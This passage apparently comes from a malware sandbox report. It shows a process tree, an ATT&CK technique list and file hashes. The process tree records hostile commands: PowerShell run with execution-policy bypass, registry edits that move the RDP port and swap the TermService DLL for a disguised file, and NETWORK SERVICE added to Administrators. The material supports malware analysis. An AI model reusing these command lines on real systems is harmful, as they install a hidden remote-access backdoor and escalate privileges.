                                                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4392.tmp" "c:\Users\Admin\AppData\Local\Temp\0zcufkzb\CSCD60F69BC39BE4420B28A687EFACFCE2.TMP"
                                                                                                                                          9⤵
                                                                                                                                            PID:4520
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                          8⤵
                                                                                                                                            PID:5864
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                            8⤵
                                                                                                                                              PID:5368
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                              8⤵
                                                                                                                                                PID:8072
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                                                                                                                                8⤵
                                                                                                                                                  PID:4396
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                                                                                                                                  8⤵
                                                                                                                                                  • Modifies registry key
                                                                                                                                                  PID:5012
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                                                                                                                                  8⤵
                                                                                                                                                    PID:3084
                                                                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                                                                    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                                                                                    8⤵
                                                                                                                                                      PID:5668
                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                                                                                        9⤵
                                                                                                                                                          PID:6928
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                                                                                                                        8⤵
                                                                                                                                                          PID:7420
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd /c net start rdpdr
                                                                                                                                                            9⤵
                                                                                                                                                              PID:7384
                                                                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                net start rdpdr
                                                                                                                                                                10⤵
                                                                                                                                                                  PID:6040
                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                    C:\Windows\system32\net1 start rdpdr
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:6116
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:6884
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd /c net start TermService
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:5528
                                                                                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                        net start TermService
                                                                                                                                                                        10⤵
                                                                                                                                                                          PID:8040
                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                            C:\Windows\system32\net1 start TermService
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:4668
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\fSDTvGEVL.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\fSDTvGEVL.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:6132
                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      PID:7272
                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w24wwasb\w24wwasb.cmdline"
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:6104
                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF76.tmp" "c:\Users\Admin\AppData\Local\Temp\w24wwasb\CSC23829899A4CE49E687F2C51AECB31A2D.TMP"
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:424
                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:7580
                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:5876
                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:7748
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:4564
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                                    PID:4356
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:5128
                                                                                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                      "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:6592
                                                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                          C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:2184
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:3688
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              cmd /c net start rdpdr
                                                                                                                                                                                              9⤵
                                                                                                                                                                                                PID:7684
                                                                                                                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                  net start rdpdr
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:6084
                                                                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                      C:\Windows\system32\net1 start rdpdr
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                        PID:6088
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:1348
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      cmd /c net start TermService
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                        PID:1124
                                                                                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                          net start TermService
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:5748
                                                                                                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                              C:\Windows\system32\net1 start TermService
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                PID:7736
                                                                                                                                                                                          • C:\ProgramData\6003733.exe
                                                                                                                                                                                            "C:\ProgramData\6003733.exe"
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4364
                                                                                                                                                                                            • C:\ProgramData\6003733.exe
                                                                                                                                                                                              "C:\ProgramData\6003733.exe"
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:4780
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 956
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:1308
                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              PID:4944
                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                              PID:4288
                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                              PID:5908
                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                PID:5928
                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                              PID:584
                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                              PID:4352
                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                              PID:5988
                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              PID:6468
                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              PID:6644
                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                              PID:6484
                                                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              PID:2232
                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding D6CB9943CEF8AA594D38BBDCA3974AF8 C
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                PID:6916
                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 77D4632FA97FF78DE218F13ABB937FD3
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                PID:6996
                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                  "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                  PID:7684
                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding B33C4BFD80D2E765C7D4CA3691B64B35 E Global\MSI0000
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                PID:5236
                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:6436
                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                PID:7284
                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  PID:7312
                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5948
                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                  PID:5580
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:7216
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Modifies system executable filetype association
                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                    PID:6604
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      PID:8060
                                                                                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5668
                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                    PID:4516
                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:5236
                                                                                                                                                                                                    • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                      C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:2288
                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                        PID:2888
                                                                                                                                                                                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:4480
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:7308
                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                            PID:6504
                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:7260
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                              PID:5532
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                              PID:600
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:8028
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:6068
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:6260
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:6112

                                                                                                                                                                                                            Network

                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                            Execution

                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                            1
                                                                                                                                                                                                            T1053

                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                            Change Default File Association

                                                                                                                                                                                                            1
                                                                                                                                                                                                            T1042

                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                            3
                                                                                                                                                                                                            T1060

                                                                                                                                                                                                            Account Manipulation

                                                                                                                                                                                                            1
                                                                                                                                                                                                            T1098

                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                            1
                                                                                                                                                                                                            T1053

                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                            1
                                                                                                                                                                                                            T1053

                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                            6
                                                                                                                                                                                                            T1112

                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                            1
                                                                                                                                                                                                            T1497

                                                                                                                                                                                                            File Permissions Modification

                                                                                                                                                                                                            1
                                                                                                                                                                                                            T1222

                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                            1
                                                                                                                                                                                                            T1130

                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                            4
                                                                                                                                                                                                            T1081

                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                            Software Discovery

                                                                                                                                                                                                            1
                                                                                                                                                                                                            T1518

                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                            7
                                                                                                                                                                                                            T1012

                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                            1
                                                                                                                                                                                                            T1497

                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                            7
                                                                                                                                                                                                            T1082

                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                            2
                                                                                                                                                                                                            T1120

                                                                                                                                                                                                            Lateral Movement

                                                                                                                                                                                                            Remote Desktop Protocol

                                                                                                                                                                                                            1
                                                                                                                                                                                                            T1076

                                                                                                                                                                                                            Collection

                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                            4
                                                                                                                                                                                                            T1005

                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                            1
                                                                                                                                                                                                            T1102

                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                            • C:\ProgramData\1354845.exe
                                                                                                                                                                                                              MD5

                                                                                                                                                                                                              a8db62010fc3ff8a86abdf3988646a8c

                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                              247577574d8f60a064b03d9f2a627d0bdbc6d2a6

                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                              cb129cd67225cb40c544eab07466be9305132fc9607214174b48f4167e0b6b3d

                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                              8234d169c809f91658f88ccb80be1dbae587ff9e0a3e517f4b42ac0f2e4a3be73b77bba787b6ebc55422c2f081b9c07e44f1192d63c90d3837b55597f68b0e1d

                                                                                                                                                                                                            • C:\ProgramData\1354845.exe
                                                                                                                                                                                                              MD5

                                                                                                                                                                                                              a8db62010fc3ff8a86abdf3988646a8c

                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                              247577574d8f60a064b03d9f2a627d0bdbc6d2a6

